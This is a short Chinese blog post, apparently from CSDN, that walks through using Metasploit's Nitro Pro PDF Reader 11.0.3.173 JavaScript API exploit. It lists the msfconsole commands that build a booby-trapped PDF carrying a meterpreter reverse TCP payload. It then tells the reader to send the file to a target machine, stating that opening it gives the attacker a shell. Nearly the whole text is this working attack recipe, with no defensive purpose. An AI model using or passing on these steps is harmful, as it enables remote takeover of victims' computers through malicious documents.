版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396580
参考:https://www.exploit-db.com/exploits/42418/
https://www.youtube.com/watch?v=EhW9GhLF_Ww
Nitro Pro PDF Reader 11.0.3.173 Javascript API远程执行代码
msfconsole
search nitro_pdf
use exploit/windows/fileformat/nitro_pdf_jspapi
set payload windows/meterpreter/reverse_tcp
set lhost 本机IP
set lport 本机端口
set FILENAME test.pdf
exploit
将生成的pdf文件cp出来,发给目标机。
前提是,目标机安装了https://www.gonitro.com
打开pdf以后,自动获得目标shell
